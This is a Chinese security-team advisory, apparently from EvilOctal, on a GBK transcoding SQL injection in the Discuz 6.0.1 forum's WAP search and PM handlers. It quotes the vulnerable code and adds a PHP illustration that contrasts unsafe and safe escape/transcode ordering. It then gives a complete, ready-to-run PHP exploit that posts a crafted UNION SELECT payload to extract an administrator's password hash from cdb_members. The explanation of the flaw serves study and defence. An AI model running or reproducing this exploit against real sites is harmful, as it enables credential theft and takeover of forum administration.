Author: 冰封浪子
Source: 邪恶八进制信息安全团队 (EvilOctal Information Security Team, www.eviloctal.com)
Vulnerability description: Discuz is a forum system built on PHP and a MySQL database. A security vulnerability was found in it; successful exploitation lets an attacker extract the administrator's password, log in to the back-end and obtain administrator privileges.
Vulnerability analysis: the character transcoding routine in Discuz's WAP module, that is, the encoding conversion class the module uses, has a serious flaw. WAP is enabled by default in Discuz, so the flaw is easy for an attacker to reach, and it is present in every Discuz version.
There are several exploitable places in the Discuz code, for example pm.inc.php and search.inc.php; the suspicious code fragments are given below:
pm.inc.php:
$floodctrl = $floodctrl * 2;
if($floodctrl && !$disablepostctrl && $timestamp - $lastpost < $floodctrl) {
    wapmsg('pm_flood_ctrl');
}
if($formhash != formhash()) {
    wapmsg('wap_submit_invalid');
}
// $msgto is interpolated into the quoted WHERE clause after passing through the WAP transcoding
$member = $db->fetch_first("SELECT m.uid AS msgtoid, mf.ignorepm FROM {$tablepre}members m LEFT JOIN {$tablepre}memberfields mf USING (uid) WHERE username='$msgto'");
if(!$member) {
    wapmsg('pm_send_nonexistence');
}
if(preg_match("/(^{ALL}$|(,|^)\s*".preg_quote($discuz_user, '/')."\s*(,|$))/i", $member['ignorepm'])) {
    wapmsg('pm_send_ignore');
}
if(empty($subject) || empty($message)) {
    wapmsg('pm_sm_isnull');
}
search.inc.php:
if(isset($searchid)) {
    $page = max(1, intval($page));
    $start_limit = $number = ($page - 1) * $waptpp;
    // $searchid is used as a quoted string, not cast to an integer, so it reaches the query verbatim
    $index = $db->fetch_first("SELECT searchstring, keywords, threads, tids FROM {$tablepre}searchindex WHERE searchid='$searchid'");
    if(!$index) {
        wapmsg('search_id_invalid1');
    }
    $index['keywords'] = rawurlencode($index['keywords']);
    $index['searchtype'] = preg_replace("/^([a-z]+)\|.*/", "\\1", $index['searchstring']);
    // $index[tids] comes straight from the row selected above
    $searchnum = $db->result_first("SELECT COUNT(*) FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>='0'");
    if($searchnum) {
        echo "<p>$lang[search_result]<br />";
        $query = $db->query("SELECT * FROM {$tablepre}threads WHERE tid IN ($index[tids]) AND displayorder>='0' ORDER BY dateline DESC LIMIT $start_limit, $waptpp");
        while($thread = $db->fetch_array($query)) {
            echo "<a href=\"index.php?action=thread&tid=$thread[tid]\">#".++$number." ".cutstr($thread['subject'], 24)."</a>($thread[views]/$thread[replies])<br />\n";
        }
        echo wapmulti($searchnum, $waptpp, $page, "index.php?action=search&searchid=$searchid&do=submit&sid=$sid");
        echo '</p>';
    } else {
        wapmsg('search_invalid');
    }
} // end of the isset($searchid) branch as excerpted
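To make the transcoding flaw concrete, the following PHP is an added illustration and not Discuz's own code: it models the WAP input path as "escape the quote, then convert the GBK bytes", using mb_convert_encoding() as a stand-in for Discuz's conversion class (an assumption), and sets it beside the two safe orderings, transcoding before escaping and, for a numeric field such as searchid, discarding the string entirely with intval(). The query_* function names and the quotes_are_escaped() check are constructed for this example; it needs the mbstring extension.

```php
<?php
// Added illustration, not Discuz code. Discuz's WAP conversion class is
// modelled (assumption) by mb_convert_encoding(): escape first, transcode second.

/** Vulnerable order: escape the quote, then transcode the raw GBK bytes. */
function query_escape_then_transcode(string $searchid): string
{
    $escaped = addslashes($searchid);            // ... 0xCF 0x5C 0x27 ...
    // 0xCF is a valid GBK lead byte and 0x5C ('\') a valid trail byte, so the
    // converter consumes the backslash as half of one character and the quote
    // that follows reaches the SQL string unescaped.
    $converted = mb_convert_encoding($escaped, 'UTF-8', 'GBK');
    return "SELECT tids FROM cdb_searchindex WHERE searchid='$converted'";
}

/** Correct order for string input: transcode, then escape in the final charset. */
function query_transcode_then_escape(string $searchid): string
{
    $converted = mb_convert_encoding($searchid, 'UTF-8', 'GBK');
    $escaped = addslashes($converted);   // stand-in for mysqli_real_escape_string()
    return "SELECT tids FROM cdb_searchindex WHERE searchid='$escaped'";
}

/** Best fix for this field: searchid is an integer, so never treat it as text. */
function query_numeric(string $searchid): string
{
    return 'SELECT tids FROM cdb_searchindex WHERE searchid=' . intval($searchid);
}

/** Review check: does every quote inside the SQL literal still carry its backslash? */
function quotes_are_escaped(string $sql): bool
{
    // strip the two delimiting quotes, then look for a quote not preceded by '\'
    $body = substr($sql, strpos($sql, "'") + 1, -1);
    return preg_match("/(?<!\\\\)'/", $body) === 0;
}

// Constructed sample: a search id followed by the 0xCF byte and a quote.
$sample = "22\xCF'/*";

var_dump(quotes_are_escaped(query_escape_then_transcode($sample)));  // bool(false)
var_dump(quotes_are_escaped(query_transcode_then_escape($sample)));  // bool(true)
echo query_numeric($sample), "\n";                                   // ... searchid=22
```

Run it with the php command-line binary; the first var_dump() prints bool(false) because the backslash added by addslashes() was absorbed into a double-byte character, which is exactly the condition a code reviewer should test for wherever escaping and charset conversion are both applied to the same input.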
The following is the exploit code for the search.inc.php issue.
Note: this exploit is purely a matter of personal interest and is provided for reference only.
<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
+------------------------------------------------------------------+
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY 冰封浪子&小志
+------------------------------------------------------------------+
");
// command-line arguments
if($argc>4) {
    $host=$argv[1];
    $port=$argv[2];
    $path=$argv[3];
    $uid=$argv[4];
}else{
    echo "Usage: php ".$argv[0]." host port path uid\n";
    echo "host: target server \n";
    echo "port: the web port, usually 80\n";
    echo "path: path to discuz\n";
    echo "uid : user ID you wanna get\n";
    echo "Example:\r\n";
    echo "php ".$argv[0]." localhost 80 1\n";
    exit;
}
// POST body for the WAP search handler
$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";
// raw HTTP request
$data = "POST /".$path."/index.php"." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "Content-length: ".strlen($content)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content."\r\n\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
    echo 'No response from '.$host;
    die;
}
fwrite($ock,$data);
// print the response
while (!feof($ock)) {
    echo fgets($ock, 1024);
}
?>
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability themselves; this site assumes no legal or joint liability whatsoever. Questions may be sent by e-mail (a corporate or otherwise valid mailbox is recommended so that the mail is not filtered; contact details are on the home page).